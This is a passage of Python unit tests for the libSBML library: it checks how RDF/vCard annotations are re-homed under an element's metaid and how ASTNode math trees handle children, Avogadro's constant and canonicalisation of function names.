" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<compartment metaid=\"_000005\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_stringChangesMetaid_1(self):
c = libsbml.Model(2, 3)
c.setMetaId("_000005")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<model metaid=\"_000005\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator rdf:parseType=\"Resource\">\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</model>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_stringChangesMetaid_2(self):
c = libsbml.Compartment(2,3)
c.setMetaId("_000005")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<compartment metaid=\"_000005\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_stringChangesMetaid_3(self):
c = libsbml.Model(3,1)
c.setMetaId("_000005")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<model metaid=\"_000005\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</model>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
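# Here the pasted RDF refers to a foreign metaid (_000005): the CV terms are
# re-homed under the compartment's own metaid, while the history block that
# could not be validated against the element is preserved verbatim (note the
# timestamps keep their original form, without the Z suffix).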
def test_SyncAnnotation_stringHistoryWhenNotValid(self):
c = libsbml.Compartment(2,3)
c.setMetaId("_000003")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<compartment metaid=\"_000003\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
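# Standard generated-test boilerplate: collect the TestSyncAnnotation cases and
# exit with a nonzero status if any of them fail.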
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestSyncAnnotation))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/math/TestASTNode.py
```python
import sys
import unittest
import libsbml
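# Machine epsilon for IEEE 754 double precision, used as the tolerance when
# comparing computed real values below.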
DBL_EPSILON = 2.2204460492503131e-16
class TestASTNode(unittest.TestCase):
def test_ASTNode_addChild1(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
c1_1 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
node.addChild(c1)
node.addChild(c2)
self.assert_( node.getNumChildren() == 2 )
self.assert_(( "and(a, b)" == libsbml.formulaToString(node) ))
c1_1.setName( "d")
i = node.addChild(c1_1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(a, b, d)" == libsbml.formulaToString(node) ))
self.assert_(( "a" == node.getChild(0).getName() ))
self.assert_(( "b" == node.getChild(1).getName() ))
self.assert_(( "d" == node.getChild(2).getName() ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
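# addSemanticsAnnotation() rejects None with LIBSBML_OPERATION_FAILED and
# leaves the annotation count untouched.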
def test_ASTNode_addSemanticsAnnotation(self):
ann = libsbml.XMLNode()
node = libsbml.ASTNode()
i = 0
i = node.addSemanticsAnnotation(ann)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumSemanticsAnnotations() == 1 )
i = node.addSemanticsAnnotation(None)
self.assert_( i == libsbml.LIBSBML_OPERATION_FAILED )
self.assert_( node.getNumSemanticsAnnotations() == 1 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
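# AST_NAME_AVOGADRO keeps whatever name the user assigns, but getReal() always
# returns the SBML Level 3 value of Avogadro's constant (6.02214179e23) and
# isConstant() is true, regardless of whether the name is set before or after
# the type.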
def test_ASTNode_avogadro(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_NAME_AVOGADRO)
n.setName( "NA")
self.assert_(( "NA" == n.getName() ))
val = n.getReal()
self.assert_( val == 6.02214179e23 )
self.assert_( n.isConstant() == 1 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_avogadro_bug(self):
n = libsbml.ASTNode()
n.setName( "NA")
n.setType(libsbml.AST_NAME_AVOGADRO)
self.assert_(( "NA" == n.getName() ))
val = n.getReal()
self.assert_( val == 6.02214179e23 )
self.assert_( n.isConstant() == 1 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
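# canonicalize() rewrites generic AST_NAME / AST_FUNCTION nodes whose names
# match SBML built-ins into their dedicated AST types; unrecognised names such
# as "Foo" are left as plain names or functions.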
def test_ASTNode_canonicalizeConstants(self):
n = libsbml.ASTNode()
n.setName( "ExponentialE")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_CONSTANT_E )
n.setType(libsbml.AST_NAME)
n.setName( "False")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_CONSTANT_FALSE )
n.setType(libsbml.AST_NAME)
n.setName( "Pi")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_CONSTANT_PI )
n.setType(libsbml.AST_NAME)
n.setName( "True")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_CONSTANT_TRUE )
n.setType(libsbml.AST_NAME)
n.setName( "Foo")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assertEqual( True, n.isName() )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_canonicalizeFunctions(self):
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "abs")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ABS )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccos")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOS )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccosh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOSH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccot")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccoth")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOTH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccsc")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCSC )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccsch")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCSCH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arcsec")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSEC )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arcsech")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSECH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arcsin")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSIN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arcsinh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSINH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arctan")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCTAN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arctanh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCTANH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "ceiling")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_CEILING )
n.setType(libsbml.AST_FUNCTION)
n.setName( "cos")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_COS )
n.setType(libsbml.AST_FUNCTION)
n.setName( "cosh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_COSH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "cot")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_COT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "coth")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_COTH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "csc")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_CSC )
n.setType(libsbml.AST_FUNCTION)
n.setName( "csch")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_CSCH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "exp")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_EXP )
n.setType(libsbml.AST_FUNCTION)
n.setName( "factorial")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_FACTORIAL )
n.setType(libsbml.AST_FUNCTION)
n.setName( "floor")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_FLOOR )
n.setType(libsbml.AST_FUNCTION)
n.setName( "lambda")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LAMBDA )
n.setType(libsbml.AST_FUNCTION)
n.setName( "ln")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "log")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LOG )
n.setType(libsbml.AST_FUNCTION)
n.setName( "piecewise")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_PIECEWISE )
n.setType(libsbml.AST_FUNCTION)
n.setName( "power")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_POWER )
n.setType(libsbml.AST_FUNCTION)
n.setName( "root")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ROOT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "sec")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_SEC )
n.setType(libsbml.AST_FUNCTION)
n.setName( "sech")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_SECH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "sin")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_SIN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "sinh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_SINH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "tan")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_TAN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "tanh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_TANH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "Foo")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
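# SBML Level 1 used C-style function names. Besides simple renames (acos, asin,
# atan, ceil, pow), canonicalize() restructures the tree: log(x) becomes ln(x),
# log10(x) becomes log(10, x), sqr(x) becomes pow(x, 2) and sqrt(x) becomes
# root(2, x).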
def test_ASTNode_canonicalizeFunctionsL1(self):
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "acos")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOS )
n.setType(libsbml.AST_FUNCTION)
n.setName( "asin")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSIN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "atan")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCTAN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "ceil")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_CEILING )
n.setType(libsbml.AST_FUNCTION)
n.setName( "pow")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_POWER )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "log")
c = libsbml.ASTNode()
c.setName( "x")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 1 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LN )
self.assert_( n.getNumChildren() == 1 )
n.setType(libsbml.AST_FUNCTION)
c = libsbml.ASTNode()
c.setName( "y")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 2 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LOG )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "log10")
c = libsbml.ASTNode()
c.setName( "x")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 1 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LOG )
self.assert_( n.getNumChildren() == 2 )
